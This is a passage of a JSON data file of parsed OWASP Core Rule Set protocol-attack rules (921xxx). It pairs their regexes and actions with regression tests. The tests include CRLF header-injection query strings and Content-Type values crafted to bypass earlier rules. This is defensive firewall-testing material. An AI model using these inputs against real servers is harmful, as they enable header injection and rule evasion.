"act_name": "tag", "lineno": 338, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 339, "act_quote": "quotes", "act_arg": "capec/1000/210/272/220/33", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 340, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 341, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 342, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 325 } }, { "rule_id": "921013", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "2", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 345, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "2", "actions": [ { "act_name": "id", "lineno": 345, "act_quote": "no_quote", "act_arg": "921013", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 345, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 345, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 345, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 345, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 345, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 345, "act_quote": "no_quote", "act_arg": "END-REQUEST-921-PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 345 } }, { "rule_id": "921014", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "2", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 346, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "2", "actions": [ { "act_name": "id", "lineno": 346, "act_quote": "no_quote", "act_arg": "921014", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 346, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 346, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 346, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 346, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 346, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 346, "act_quote": "no_quote", "act_arg": "END-REQUEST-921-PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 346 } }, { "rule_id": "921151", "has_tests": true, "detection": { "variables": [ { "name": "ARGS_GET", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "[\\n\\r]", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "HTTP Header Injection Attack via payload (CR/LF detected)", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/210/272/220/33" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": "GET", "uri": "/get?941151-1=test%0Dnext=more", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921151 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "941151-1=test%0Dnext=more" } ] }, { "description": "", "test_id": 2, "request": { "method": "GET", "uri": "/get?941151-2=test%0Anext=more", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921151 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "941151-2=test%0Anext=more" } ] }, { "description": "", "test_id": 3, "request": { "method": "GET", "uri": "/get?941151-3=test%0A%0Dnext=more", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921151 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "941151-3=test%0A%0Dnext=more" } ] }, { "description": "", "test_id": 4, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "941151-4=test\\r\\nmore=text" }, "expected": { "should_block": false, "rule_ids": [ 921151 ] }, "malicious_patterns": [ { "location": "post_body", "value": "941151-4=test\\r\\nmore=text" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 358, "variables": [ { "variable": "ARGS_GET", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "[\\n\\r]", "actions": [ { "act_name": "id", "lineno": 359, "act_quote": "no_quote", "act_arg": "921151", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 360, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 361, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 362, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 363, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 364, "act_quote": "quotes", "act_arg": "HTTP Header Injection Attack via payload (CR/LF detected)", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 365, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 366, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 367, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 368, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 369, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 370, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 371, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 372, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 373, "act_quote": "quotes", "act_arg": "capec/1000/210/272/220/33", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 374, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 375, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 376, "act_quote": "quotes", "act_arg": "tx.http_violation_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 377, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 358 } }, { "rule_id": "921422", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Content-Type", "negated": false } ], "operator": { "type": "@rx", "argument": "^[^\\s\\x0b,;]+[\\s\\x0b,;].*?\\b(?:((?:tex|multipar)t|application)|((?:audi|vide)o|image|cs[sv]|(?:vn|relate)d|p(?:df|lain)|json|(?:soa|cs)p|x(?:ml|-www-form-urlencoded)|form-data|x-amf|(?:octe|repor)t|stream)|([\\+/]))\\b", "negated": false } }, "transformations": [ "none", "lowercase" ], "metadata": { "phase": "1", "message": "Content-Type header: Dangerous content type outside the mime type declaration", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/255/153" ] }, "test_cases": [ { "description": "Bypass targeting recommended rules (rule 200000)", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/x-www-form-urlencoded;boundary=\"application/json\"" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921422 ] }, "malicious_patterns": [] }, { "description": "Bypass targeting recommended rules (rule 200006)", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/x-www-form-urlencoded;boundary=\"application/vnd.mycompany.myapp.customer-v2+json\"" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921422 ] }, "malicious_patterns": [] }, { "description": "Bypass targeting recommended rules (rule 200001)", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/x-www-form-urlencoded;boundary=\"text/xml\"" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921422 ] }, "malicious_patterns": [] }, { "description": "Bypass targeting recommended rules (rule 200001)", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/x-www-form-urlencoded;boundary=\"application/xml\"" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921422 ] }, "malicious_patterns": [] }, { "description": "Bypass targeting recommended rules (rule 200001)", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/x-www-form-urlencoded;boundary=\"multipart/related\"" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921422 ] }, "malicious_patterns": [] }, { "description": "Bypass targeting recommended rules (rule 200001)", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/x-www-form-urlencoded;boundary=\"text/html\"" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921422 ] }, "malicious_patterns": [] }, { "description": "Bypass targeting recommended rules (rule 200001)", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/x-www-form-urlencoded;boundary=\"image/jpeg\"" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921422 ] }, "malicious_patterns": [] }, { "description": "Bypass targeting recommended rules (rule 200001)", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/x-www-form-urlencoded;boundary=\"foobar/foobar\"" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921422 ] }, "malicious_patterns": [] }, { "description": "Negative test for 921422-1", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/json" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921422 ] }, "malicious_patterns": [] }, { "description": "Negative test for 921422-2", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/vnd.mycompany.myapp.customer-v2+json" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921422 ] }, "malicious_patterns": [] }, { "description": "Negative test for 921422-3", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "text/xml" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921422 ] }, "malicious_patterns": [] }, { "description": "Negative test for 921422-4", "test_id": 12, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/xml" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921422 ] }, "malicious_patterns": [] }, { "description": "Negative test for 921422-5", "test_id": 13, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/soap+xml" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921422 ] }, "malicious_patterns": [] }, { "description": "Negative test for 921422-6", "test_id": 14, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "text/html" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921422 ] }, "malicious_patterns": [] }, { "description": "Negative test for rule 921422-7", "test_id": 15, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "text/html; charset=UTF-8" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921422 ] }, "malicious_patterns": [] }, { "description": "Negative test for rule 921422-8", "test_id": 16, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "multipart/form-data; boundary=something" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921422 ] }, "malicious_patterns": [] }, { "description": "Negative test for rule 921422-9", "test_id": 17, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "multipart/form-data; boundary=----webkitformboundary12w4lszoxn26vnd" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921422 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 394, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Content-Type", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^[^\\s\\x0b,;]+[\\s\\x0b,;].*?\\b(?:((?:tex|multipar)t|application)|((?:audi|vide)o|image|cs[sv]|(?:vn|relate)d|p(?:df|lain)|json|(?:soa|cs)p|x(?:ml|-www-form-urlencoded)|form-data|x-amf|(?:octe|repor)t|stream)|([\\+/]))\\b", "actions": [ { "act_name": "id", "lineno": 395, "act_quote": "no_quote", "act_arg": "921422", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 396, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 397, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 398, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 399, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 399, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 400, "act_quote": "quotes", "act_arg": "Content-Type header: Dangerous content type outside the mime type declaration", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 401, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 402, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 403, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 404, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 405, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 406, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 407, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 408, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 409, "act_quote": "quotes", "act_arg": "capec/1000/255/153", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 410, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 411, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 412, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 394 } }, { "rule_id": "921015", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "3", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 415, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "3", "actions": [ { "act_name": "id", "lineno": 415, "act_quote": "no_quote", "act_arg": "921015", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 415, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 415, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 415, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 415, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 415, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 415, "act_quote": "no_quote", "act_arg": "END-REQUEST-921-PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 415 } }, { "rule_id": "921016", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "3", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 416, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "3", "actions": [ { "act_name": "id", "lineno": 416, "act_quote": "no_quote", "act_arg": "921016", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 416, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 416, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 416, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 416, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 416, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 416, "act_quote": "no_quote", "act_arg": "END-REQUEST-921-PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 416 } }, { "rule_id": "921230", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Range", "negated": false } ], "operator": { "type": "@gt", "argument": "0", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "HTTP Range Header detected", "logdata": "Matched Data: Header %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/210/272/220" ] }, "test_cases": [ { "description": "Submit HTTP Range Header, forbidden at PL3 by default", "test_id": 1, "request": { "method": null, "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Range": "1-2" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921230 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 432, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Range", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@gt", "operator_argument": "0", "actions": [ { "act_name": "id", "lineno": 433, "act_quote": "no_quote", "act_arg": "921230", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 434, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 435, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 436, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 437, "act_quote": "quotes", "act_arg": "HTTP Range Header detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 438, "act_quote": "quotes", "act_arg": "Matched Data: Header %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 439, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 440, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 441, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 442, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 443, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 444, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 445, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 446, "act_quote": "quotes", "act_arg": "capec/1000/210/272/220", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 447, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 448, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 449, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 432 } }, { "rule_id": "921170", "has_tests": false, "detection": { "variables": [ { "name": "ARGS_NAMES", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": ".", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": null, "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/152/137/15/460" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 473, "variables": [ { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": ".", "actions": [ { "act_name": "id", "lineno": 474, "act_quote": "no_quote", "act_arg": "921170", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 475, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", 